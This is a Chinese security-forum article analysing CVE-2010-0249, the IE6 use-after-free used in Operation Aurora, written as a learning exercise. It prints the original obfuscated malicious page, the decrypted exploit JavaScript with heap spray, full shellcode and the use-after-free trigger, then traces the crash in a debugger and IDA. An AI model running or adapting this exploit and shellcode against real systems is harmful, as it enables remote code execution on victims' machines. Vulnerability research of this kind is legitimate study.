查看原文
其他

小白的CVE-2010-0249——极光行动漏洞分析

Ashen1 看雪学院 2021-03-08

本文为看雪论坛优秀文章
看雪论坛作者ID:Ashen1


漏洞分析环境与工具:


操作系统:用作服务器的主机 (使用PhpStudy 搭建):Window 7 专业版 (32 位)

靶机:Window XP Pro SP3

软件:IE 6.0

工具:Ollydbg,windbg,IDA Pro,Sublime Text,Chrome,PHPStudy,WireShark


漏洞分析



获取poc



1. 通过协议分析客户端获得恶意html(POC)


查看会话:



然后流跟踪,可以发现:





2. 分析服务端发送的html文件

下面是提取出的网页代码:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
        //定义了一个字符串,用于解密成代码
        var IwpVuiFqihVySoJStwXmT = '04271477133b000b1a0c240339133c120e2805160e1503684d705005291a08091b3e6e713e1122520b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39394a716a2615275207142524357d43772c2702705a2f466a657c6e4a256a7450614176566c65257e4165310515150a0f2b35302a103d0e03041e0234362f3a3c34073e1b0d0d02131e3f1635200e21101c38093913112e322223211f3239302133381b330a0c2c1175576c2e2713251f2308236b2f270f2d3e2d353c172b03393164031d192b1e363c012f072d311538230f2e113979490b03123d051808392c0d27123b0a0805033c1c0735321a2407350314142935250829083c0a0000072f142624011f2a27022825082f253f2c39393125176614310627466a656e0d3a3968730d261334463b1122303b07052d3d3705303e36340f05131d0b2934142b070d33657175043926244b261334461d362b31063d3e00263e1c110f11080f250e340020150110220c1e111c3d0e273f3a3a21050f2b2208341f04042c684d701c231177043e270b3562614b26133446220e083e1c0d0e1b3d1d31362b271221170036001a240230092e222638383d152b1a23162b0d3330230b14053e3e3c1a321537122d27043a30271d2439383b121f160a033e1c211e383f203e3e143136190210081f2c1e231603112d363975576c3f261523112716327e2a20042f3e211f3e5221212e233d131c0f1318223d2a24080212361718392626070a24072c27102533210823092a15390917190d3e3310250d0c04053d04173d1c0f212b180820333c382d3e3d2036000921320a1c36371e4e7e3e3a34186c271f1707352e1f260a1a2d281c3b3c1e113411272e3d2419043d080611023c280d1c3318332b3b1c3d061f0b050810103b173a160f32230a060d16260216001c1c05684d70070d223c330d113901070b001d02110b152f361f3818180a3f180725123a121534381f0c113b05152021162a3e211e26282f012408242e381f27020605220124293309293c3321011a033a040822143533003f08000e22392c35270835137f656b701f2a727c4175077f5565726920537b782e55254b7f52366039610b75286d05364b7255723078305e2e6f3d49624b76432223746108693f7b47694063136423756c4f392c7d49695733526f7c7d701f75287b167507725f632369205e29797f5525417152616039315c78786d05644a720372302a6d592a6f3d44364b774322767b6153693f7c4164136313637c2a314f3973704966573355602328701f782b7c1175077f506e7469205e7b7e7a55254623526460396c08787d6d0569107f5672302a6d597b6f3d1669462743227129665d693f2e13364763136e762a364f397e29433657335460717f701f75727c16750722506e726920537b2c7d55254b7752646039615b78726d0536477f5672302a365e746f3d4436147f4322777b315c693f7c116245631331217e624f392c7d4963573300337174701f75727116750772076e7569205e742c7d5525467f00336039615375796d05644a74517230756d53756f3d43364b2443227c7d6c59693f2c46644a631331217f334f397e7a4469573354602328701f752c714075072002647269205e7d797f55254b7f5f6460396c5d78796d05364775517230756d5e7d6f3d493240714322767b6c59693f7141644063136e7475634f397e7044675733006f2374701f2a2e7c48750772556e776920592a73795525462452646039615a787d6d056942200572307566592a6f3d496840714322777b610c693f7c4963456313637575674f397e794236573352357c7d701f2a727b16750772506e7c69205e7b7e7155254b705f6660396c5378736d056442725772307567592a6f3d42674b754322717f3352693f7c41694a6313317d756c4f397370496957335260712d701f78737c407507725e6e7769205e297e7e55254b77003460393352787b6d05644a7f507230756d5e296f3d426714224322712a6c58693f71466941631363762a6d4f39732e16655733006f7c7f701f2a2e2c4675072250637c69205e2d7e7e5525467f5f666039330e75726d0564452250723075375e7f6f3d16684b754322712e3353693f7c15644b6313632478634f397e7b446857330062717c701f787971487507750063276920537c7e7e55254624556060396158787b6d0563457f5f7230756c5e2a6f3d44314b714322232f6c5a693f7c1163146313637c75374f39797f496357335231767b701f782b711275077400637c69205e7c7e7b55254b2052656039610b2a726d056245725672302a3153756f3d166514224322767b615d693f7c4069406313647278624f39737b146657335f6f717a701f757c714975077500652369205e7b2c70552514255f6660396c5d75286d053647205e723028635e7b6f3d4463147f4322717f615d693f7c11634563133126786d4f397378423657335f352328701f78737c4275077451317c6920587b73795525467e5f316039615975726d0564417f5672307564537f6f3d49694171432223796c58693f7c49644063136e7378374f397379496357335f65772a701f75787c1275077551637d6920582a732a5525417154316039615b78286d056945725772302a360c756f3d4469147f4322217a335f693f714136116313637378664f397e7916345733006f7c7f701f7f7d7a47750772046e766920582a787f55254b765f3160396152787d6d05644b200272307562582a6f3d163446774322717b6c08693f7b4764406313637d2a6d4f397379446657335264217a701f75287a477507725731216920537f7e705525407152656039665d757c6d05364a205f72302a315e756f3d43364b7643227c7a6c5a693f71406944631331702a314f39782e496957335f6f2328701f2a2e2e147507725565236920537a2e7e55254b7552656039330978786d0564137f5e723078305e7e6f3d496246754322717b675d693f71436910631363722a314f397e79496357335236762a701f7f2c714175077f546e276920537d7e715525147f006f6039335f75286d05644a725f72307865532e6f3d49674b704322712e610c693f7147694563133170786d4f39737844615733526e7174701f757b7c4175077451637669205e7a2c7d552541715f6e6039335f78736d0569407f5472302a60537e6f3d44634b7443227c7c6153693f2e49644b6313637575674f397e784960573355312375701f782b2e1475077400637c69205e7e7e7b552546705f6060396c5c757d6d0569457251723078665e296f3d4962147e4322717b615b693f7b47364a63136e277e334f397e7e1466573355607c7d701f2a2e71477507725e6e2369200e7a737b552540205f616039665d757d6d056443200572302a6d537e6f3d16334b754322217a6c53693f7c4769406313637475374f39792e4432573352317c7c701f75282e147507725f642369200c282c7d55251473526660396159752c6d05364b205372307565532e6f3d44324b7f43227c7c6c59693f2e1469436313657278634f39737049365733526e717e701f757d2e487507725e6e7269205e7b792e55254b755560603933097f2c6d05364b200272307830582a6f3d4462147e43222375670c693f7146694263136e7575634f397e71146657335f317c2a701f757a714875077f56637569200c75737955254624546060396c0c757b6d056413725e7230786d0c746f3d4336467543227c75665d693f7c41344463136e7c78344f397e7a4432573352357c7a701f757b7c467507725e317d69200c74737b55254671543160396c527e2c6d05644b7f57723078675e7d6f3d493246744322717a6c08693f7c4263146313632378304f39737f496257335f657c7a701f2e2c714875072751672769205e2d2c2a5525167e0235603936537e736d056746225f72302a6158786f3d443210774322767d600b693f794267136313322474664f397a7b16335733076e727d701f2e2c79497507715767716920087e727155254a73006e603931082f2f6d0567137e0572307d36582a6f3d1663172343227728360b693f7e4763116313662675304f392f7b166057330734237e701f2d7b7f1275077451327369205c297a7155254a20566f603961522d7d6d0561427451723079605a7a6f3d14621724432277756553693f7846364463136675296c4f397f2a4369573353622074701f757e7a4475077603357d69205a7b787a55254127543460396c5e7b7c6d053511720272302d610c2f6f3d486941734322707d3659693f714068146313347c7d664f392e2a4864573350667d2e701f2a282b427507275036246920097b7b7955251175036260393759297b6d056047205172307f3759746f3d466911704322757e6c5c693f7e4735446313637629624f39737f1361573304317c7e701f7e7f7b4175077104367169200c7d7e2a55254b2354666039625829286d0567137f57723079635a286f3d406846714322747f655b693f7d466011631336777c634f392f2b136157335431767e701f7e782d4475077004357669200f7a297a5525407e5f316039370f7a286d056917725372302d6553786f3d473640744322242d665a693f714433436313317478674f397f714834573356367274701f2a7c7c157507715f672769205f757d2b552543730760603964582f296d053543705772307c6c597f6f3d473416734322277e360b693f7d476247631332737c6c4f39292e476557335e602774701f7c2c791575077354637169205f2a28785525422203366039665a7b7a6d0536177207723079345b746f3d42614673432273796652693f7c11681463136e2328674f39287d4568573305637d2d701f792e7d4275077652347d69205d2a7d7b5525177452626039630c7d736d053211765572307d6308796f3d436642234322217a675d693f7b426847631362267a624f39297a426957335f62777a701f287a7c447507735333236920522d7b7b5525447f51616039345b742f6d053614715072307a6559786f3d4967407643227079665c693f7b486044631335752f6c4f392c79413357335135702a701f2a2f7c12750771046f2369200b74722a5525452405626039650929796d0562142402723079665b7a6f3d4533447e4322267a6d08693f7b456940631363757b334f39282a163157330761247a701f787e2945750775506f216920537e732955251025036f60396c5a292b6d056716775e706c77230b3e6a3d1136050e2131121938122703291d704f66131c0127232b0819053d13020b1600280e3f1006181c22123d0e1334312102332d181b360939130131020d3a18383e22123703321c350d230f011b26011819263f27180a272307183a07001c0a340024101b2f2e192e26033437311c24306475486968685b70503344776e6c775a6e6a6350721164467c656e65486c6168523450664d77676920486c6168526050664d77672f774a676a6a4072526d4675216e7543772e27502b523307313204120c1b1f25083b3b270b776e71751f2d2c3f38171411333a3d271c0b216a3550271a2f0a326d6c200b2a3d00373625130b2f2e05340762262d1e37062e466b657c2d0e7c7a7840705b7d0038376c7d396c7768406b5215466b657d605a776a1b5b7b5b662c242228391b38021e1e3e252f201a063c311206222d2132162c2f031524310139380201273b0b131a3d063b222a111b2d704f661336233b1d2d2a1d1d1d28190f073a656775071b2d1f37380b3729013d0e051b3824093607333f1e3f09222428022b1a3e3e190d1003230d223c393c0709131c013320071c0f2f361912041b0237210d103a052577372e053e11320f382b6c02033f2d0d17043c0300360a023001093b293d293313271b09010c3d6429380a3e331c0e1021381a021809062306350a34331c29100c0f0b183b1d173c122714223a21180d03033a002e0e3c2a34163d1c30610b37353f0026033a16331c182528321c13312d073e2006223d1226113836333e230711030d100d3b1f03082e2523363c2d083e1d3f12032c3f14310d01282409243a3b2a2c032d102f38120e262e35085a6f5d3b1122303b07052d3d3705303e36340f05131d0b2934142b070d336571750e23293d1d351c3248343729341e290f3e153e0609043d202f21422f3a321e11282e213331033d3e0f041b26173e14020e200933290d1a033d35083216062b231e3e0b013b1a221a2e0d383d0f023a366373143f11330b322b387b0d293e0d1c351f23082307351c0e64683e18012b0025232a083b25361f07052833200a1316360327050211183a38290c160a0f1d24163e19143c0a1536111029101e24090f1402062f2f0e67657b0322242d0218260b2a77786c7748773d211e341d31482420381c04382f3a06311e6e08363c261b1f1f242b1e2835280e0d0106272f142b3c23141936097b6579654377372e053e11320f382b6c3b0b35200605031c25082f02223d3008003a3508133235132e3c3a42653138506d52643a22752f650c103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3136397a2b40342e3356347528091f7c2978140c077605672110205a2f7a2c2c2542255633193965097c2e1405601176020b307c365a28163d403342223a22752f650e103f781360161a1367267c3148772c2702705a2f466a657c6e4a256a74501d17031e1e082e200c091d0a391c1c1420270c212c121e1e1f371500050a2e352e302838301802113b05053f1139330706123d0a39312e0f222962390f222d3c186b522f4d7c6c37180f0932013d3207202300070519041e0c38393d0b3e3403120b10180f263100321704122d153e14230f29202425142b2c0f30363c2924233d1c0b1b1b48332438344a716a384b2d04271477316c684a201e2615013909031a223b23322d3b0b2029230707130115140128643b0233372a033a2022215131';
        var RXb = '';
        //下面的循环用于解密js脚本
        for (i = 0;i<IwpVuiFqihVySoJStwXmT.length;i+=2) {
            RXb += String.fromCharCode(parseInt(IwpVuiFqihVySoJStwXmT.substring(i, i+2), 16));
        }
        //获得请求连接中?问号后面的内容
        var vuWGWsvUonxrQzpqgBXPrZNSKRGee = location.search.substring(1);
        var NqxAXnnXiILOBMwVnKoqnbp = '';
                //使用问号后面的内容进行解密
        for (i=0;i<RXb.length;i++) {
            NqxAXnnXiILOBMwVnKoqnbp += String.fromCharCode(RXb.charCodeAt(i) ^ vuWGWsvUonxrQzpqgBXPrZNSKRGee.charCodeAt(i%vuWGWsvUonxrQzpqgBXPrZNSKRGee.length));
        }
        //window.eval(code),NqxAXnnXiILOBMwVnKoqnbp是生成的js脚本,声明定义脚本内的变量,函数
        //函数只会被声明不会被执行
        window["eval".replace(/[A-Z]/g,"")](NqxAXnnXiILOBMwVnKoqnbp);
 
</script>
</head>
<body>
    //页面加载完所有内容执行WisgEgTNEfaONekEqaMyAUALLMYW函数
    //onload 常用在 <body> 中,一旦完全加载内容(包括图像、脚本文件、CSS 文件等),就执行函数
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY">
    <iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" />
</span>
</body>
</html>
</body>
</html>

首先,创建了一个字符串。


接着把对该字符串进行解密,请求链接?后面的数据被用来解密:



解密完代码后使用window["eval".replace(/[A-Z]/g,"")]定义解密后的js代码中的变量,声明其函数:



再gif图片被加载完后执行函数WisgEgTNEfaONekEqaMyAUALLMYW:



通过Chrome的开发者工具(F12),获得解密后的JS脚本:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var VwUaVFlsiaztYmICdYI = "COMMENT";
var MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul = new Array();
for (i = 0; i < 1300; i++)
{
    MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i] = document.createElement(VwUaVFlsiaztYmICdYI);
    MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = "XPu";
}
var lTneQKOeMgwvXaqCPyQAaDDYAkd = null;
var JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf = new Array();
var uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu = unescape;
function gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX()
{
    //ShellCode
    var mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu('%uf841%u9327%u972f%u994a%u4a9b%uf943%u4e4b%u9290%uf84b%u3792%u3f99%uf599%u4891%u9b3f%u494f%u4e37%u3746%ud642%u484e%uf83f%u4f91%u3749%u414a%u49fd%u9896%u37fd%u4a4a%u9691%u4742%u4e43%u9b47%u9b90%uf837%uf94a%u4e37%ufcf5%u93fc%u4a3f%u2743%u984f%ud697%u97f5%u9143%u4148%uf590%ufc48%u4ff9%u27d6%u4a27%ufd27%uf593%ufd48%u989f%u4a90%u48f5%u49fd%u4993%u4827%u9899%u3f9b%u9193%ud648%ufd3f%u4249%u27fd%u9f90%ufd37%u4137%u9993%u9743%uf537%u9841%u9b27%u3793%u9142%u9196%u4847%uf8f8%ufd48%u4392%u3f91%u4b43%u4047%u90fc%u933f%u9827%u274f%u4937%u4092%u412f%u4b91%uf83f%u4699%u4749%u9691%u9949%u4041%u923f%u2793%u43f8%u4198%uf899%u9899%u474a%u4940%u4892%u4e46%u91fc%uf841%u4896%u984e%u27fd%u4f92%u9693%u43f8%u9ff5%uf893%ufdd6%ud649%u4a46%u4991%ufd98%u47d6%u9b43%uf893%u4bf9%u4e49%u4a46%u4348%uf540%u4398%u3f4b%u9046%u4b37%u4241%u3799%u994f%u4a97%ufc90%u4a3f%u499b%u3793%u4f37%u4a9b%u2f49%u4043%u9f42%u4af8%u2740%ufd99%uf5fd%u3747%u4092%u3747%u93d6%u9846%u9699%u3f2f%u47f8%ufc91%u979b%uf5f8%ud647%u43f9%u4347%u4a37%ufc48%u902f%u9bfd%u4942%u27f9%u2791%u489f%u4398%u4390%u9193%u9937%uf592%u4942%u964b%u9193%u922f%u924b%u3748%u2f9b%u372f%u414b%u9741%ufcf9%u49f9%ud6f5%u91fc%u4643%u41fd%uf893%u3727%u4b93%u2f27%u909f%u4847%u49fd%u972f%ufd41%u479b%u3742%u48f8%u9146%u43d6%u9b27%u41fd%u9348%u2742%u3796%uf8f9%ufd49%u3f90%u9690%u9096%uf5fd%u2f99%u98fd%ufdfd%u432f%u96d6%u9342%ufc42%u4a98%u4e42%u9243%u4727%u939b%u47fd%u4193%u4a3f%u3f91%u929b%u9149%uf9f8%uf59b%u4849%u409b%u9796%u4b4f%u9797%uf548%u9041%u4948%u9141%u2743%u46f5%u3799%uf549%u9292%uf592%u4392%u9049%uf949%u4092%u4090%u3ff9%u4afd%u2f49%u4243%u4697%u9697%u9747%u434e%u92f8%u4741%u37f8%u9b2f%u46d6%u3791%ufd97%u489f%ud693%u2f96%u3797%u41fc%uf892%ufc93%ud699%u4792%u419b%u3f4b%u4f90%u9bfd%u493f%ufdf5%uf541%u439f%uf9f5%u909b%u4b99%u9093%ufd91%u2746%u989f%u4942%u97f8%u4897%u473f%u9337%ufc3f%uf9fd%u4e2f%u42f8%uf92f%u9690%u9096%u49d6%u9f9f%u9098%u9040%uf991%u4b27%u9f91%u4a48%u48f8%u3f43%u9937%u41d6%u994a%u424b%u4b96%u9146%u48f8%uf893%u472f%u982f%u4991%u4241%u9b42%u469b%u423f%u4f4e%u9792%u9296%ubf98%ua70b%u4afb%ud8db%uc929%u74d9%uf424%u4bb1%u315a%u127a%uea83%u03fc%ua971%ubf19%u7104%ub289%u85f9%udbce%u7a8c%u1c2f%uf3ee%u2dca%u673c%u1c9e%ue3f0%uacf2%ua17b%u27e6%u6e09%u8f08%u48a7%u1027%u5506%ud2eb%u2909%u06f6%u10e9%u5b39%u55e8%u9424%u0eb8%u0722%u3a2c%u9476%uec4d%ua4fc%u8935%u51c3%u908f%uc913%udb84%u618b%ufbc2%ua6aa%uc711%uc3e5%ub3e1%u05f7%u3b38%u69c6%u0296%u67e6%u43e7%u97c1%ubf92%u2531%u7ba4%uf14b%u9e21%u72eb%u7a91%u560d%u0847%u1301%u560c%ua206%uecc1%u2f32%u22e4%u6bb3%ue6c2%u289f%ube6b%u9e45%ua094%u7f22%uaa30%u94c1%uf142%u598d%u0a78%uf64e%u790b%u597c%u15a7%u12cc%ue161%u0933%u7dd5%ub2ca%u5725%ue609%ucf75%u87b8%u0f1e%u5244%u5fb0%u0dea%u3070%ufe4a%u5a18%u2145%u6538%u4a8f%u9fd2%ub558%uc48a%u5d52%u04c8%u7f73%ue245%u6f19%ubc03%u16b5%u360e%ud627%u3285%u5c67%uc229%u9526%ud044%u55df%u8a13%u6976%ua18e%uff76%u6034%u9720%u5536%u3806%ub0c9%uf11c%u7b5f%ufe4b%u7b8f%ua88b%u7bc5%u0ce3%u2fbd%u5316%u5c68%uc68b%u3592%u407f%ubbfa%ua6a6%u44a5%u368d%u929a%ubce8%u90ea%u7d18');
 
var uafwHGfWUmxkIam = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
    do 
    {
        //创造出一块0x0c0d
        uafwHGfWUmxkIam += uafwHGfWUmxkIam
    } while( uafwHGfWUmxkIam.length < 0xd0000 );
    //堆喷射
    for (S = 0; S < 150; S++)
    //创造含有ShellCode的内存块
    JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam +
    "\u900d\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090" +
    mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;
}
function WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz)
{
    //堆喷射
    gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX();
    //创建一个event对象副本,但是对于CTreeNode对象的引用计数不会增加
    lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);
    //将span对象的innerHtml清空,释放Img对象,导致CTreeNode对象的释放
    document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";
    //创建定时器,触发漏洞
    window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);
}
function nayjNuSncnxGnhZDJrEXatSDkpo()
{
    //用来填充被释放的CTreeNode对象的空间
    p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i < MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul.length; i++)
    {
        MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = p;
    }
    //取得srcElement属性会调用get_srcElement函数,从而触发漏洞
    var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
}
 
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span></body></html>
</body>
</html>

小结:

当使用HTML访问服务器时,服务器会返回一个重定向信息迫使客户端重新发起请求,然后通过请求链接中的索引解密返回的html文件中的JS代码,接着在本地执行js脚本触发漏洞并且执行ShellCode。


复现漏洞



搭建漏洞环境,执行漏洞poc。

执行 poc 以及样本(在执行时,如果使用OD 附加,需要把原本忽略的异常都恢复)

执行恶意html :在Win7电脑上开启phpStudy设置服务器,将提取出来的html放在网站根目录中,在WindXP上访问地址http://win7的IP/hack.html?rFfWELUjLJHpP。

访问结果触发异常,如下:


从图中可以看出,由于此时的eax为0x00000000,导致了下面的call出现了异常,而eax的值是从ecx中地址取内容获得的,所以重点就是ecx的值是由谁赋值的。



分析漏洞



随着js脚本分析漏洞成因。

1. 找到执行函数


从图中可以看出,加载完gif后会调用WisgEgTNEfaONekEqaMyAUALLMYW函数,参数是一个event对象(在此处是iframe的event对象)。

2. 先简要分析WisgEgTNEfaONekEqaMyAUALLMYW函数


先查看该函数调用的第一个函数。

很明显的,这是一个堆喷射函数,目标是把0x0c0d0c0d的只是内容覆盖为0x0c0d0c0d,大红框内就是ShellCode。


堆喷结束后,会创建一个event对象副本,本例中传入的是IFream的event对象,然后将将span对象的innerHtml清空,释放iframe对象,最后创建一个定时器,接下来查看定时器函数的内容。


可以推断,应该是定时器最后的代码。

var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
触发的漏洞。

3. 验证是否是srcElement触发漏洞


从异常触发点的调用堆栈可以看出,是调用了get_srcElement后,引发了异常,而之前的:


正是调用get_srcElement函数。

4. 分析js脚本是如何引发漏洞的

参考了看雪大佬的文章:
https://bbs.pediy.com/thread-105899-1.htm

首先,在函数中引发漏洞的关键函数是下面三个:


而触发漏洞的是定时器函数:


那么要分析如何触发漏洞,就得分析浏览器是如何获得srcElement属性的,那么就要理解函数get_srcElement是如何实现的,以下是看雪大佬的原话:


而从这段话中分析出来的一个结构是这样的,get_srcElement函数要获取srcElement属性需要从CEventObj中获取EVENTPARAM结构中的CTreeNode指针,接着再通过CTreeNode指针获取指向CElement的指针,下面是具体的结构图:


Event对象就是CEventObj。

那么接下来根据上面看雪大佬的话以及结构图,进入IDA中分析。

下面是get_srcElement函数:



进入函数GenericGetElement中分析,函数内部执行GetParam函数,push了 ebp-8 作为参数,该函数获得了EVNETPARAM的地址。


GetParam函数内部,下图中的ebp-8指的是函数外Push的ebp - 8,而不是GetParam的局部变量。


GenericGetElement执行了函数GetParam,从参数中就可以看出该函数会把ebp-8地址的内容赋为指向EVENTPARAM结构的指针,接着下面有个必定会通过的跳转。



因为GenericGetElement函数的第二个参数始终都是0x3E9:


跳转的位置就是给esi赋值为指向CTreeNode的指针,esi = ptrCTreeNode。


ecx = ebx = ptrCElement。


调用函数SecutityContext。

分析至此即可,因为这里正是异常触发点,接下来回到js代码。


createEventObject拷贝了一份event(就是CEventObj类型的对象)对象,而event对象中存在EVENTPARAM结构体,而结构体中又有CTreeNode的指针,拷贝之后指向CTreeNode对象的指针多了一个,但是其引用计数却没有增加,导致CTreeNode被引用计数为0被释放时,出现了一个指向CTreeNode结构体被释放前位置的悬空指针,这也是导致漏洞的关键。(JS构建的对象都会有引用计数,和JS的垃圾回收机制有关)

createEventObject所执行的函数:



拷贝EVENTPARAM的函数:


从头到尾看了一遍代码,确实没有增加其引用计数的代码,继续往下分析js脚本。


document.getElementById("id").innerHTML = "";

在本例中,会把<span></span>中的内容释放,其中iframe的event同样会被释放,而当前指向CTreeNode的指针只有event中的一个,那么此时CTreeNode对象的引用计数减少为0,CTreeNode对象被释放(JS垃圾回收机制),下面为span中的内容:


导致出现了拷贝的event中EVENTPARAM结构里悬空指针的诞生,继续往下分析。


既然出现了一个悬空指针,那么只要往悬空指针指向的地址填入0x0c0d0c0d,而且之前堆喷也将0x0c0d0c0d的地址(及附近地址)填充为0x0c0d0c0d就可以成功利用漏洞了,通过前面的分析截图可以看出逻辑:




会出现 :
[ptrCTreeNode] = 0x0c0d0c0d;
esi = ptrCTreeNode;
ecx = ebx = 0x0c0d0c0d; //mov ebx,[esi];mov ecx,ebx
eax = 0x0c0d0c0d;        //mov eax,[ecx]
call dword ptr [0x0c0d0c0d+34h] ;call 0x0c0d0c0d

那么接下来定时器函数的作用就是把CTreeNode的内容填充为0x0c0d0c0d,然后取srcElement触发漏洞执行ShellCode。


填充的位置是之前创建的堆,覆盖掉 释放前CTreeNode结构体的位置:


根据上面的分析做个测试。


在包含ShellCode的代码块中间加一段0x9090,接着用OD附加IE6.0,然后在进入ShellCode的函数GetDocPtr(0x7E44C4C3)下断点,条件设置为ecx = 0x0c0d0c0d(从上面的分析可以看出来)。


此时和分析的一样:


接下来进入函数:


也符合上面的分析(如下):


Call进去后将会遇到一堆0x0c0d的滑板指令:



成功执行到设置的0x9090:


完毕。



漏洞利用



红框内为原本的ShellCode:


对其进行替换:


运行结果:




小白第一次发帖= = 感觉写的有点乱,非常抱歉。





- End -







看雪ID:Ashen1

https://bbs.pediy.com/user-865596.htm 


*本文由看雪论坛  Ashen1  原创,转载请注明来自看雪社区







推荐文章++++

手动打造应用层钩子扫描

固件分析--工具、方法技巧浅析(上)

固件分析--工具、方法技巧浅析(下)

AFL afl_fuzz.c 详细分析

跨平台模拟执行 - AndroidNativeEmu实用手册







进阶安全圈,不得不读的一本书










“阅读原文”一起来充电吧!

    您可能也对以下帖子感兴趣

    文章有问题?点此查看未经处理的缓存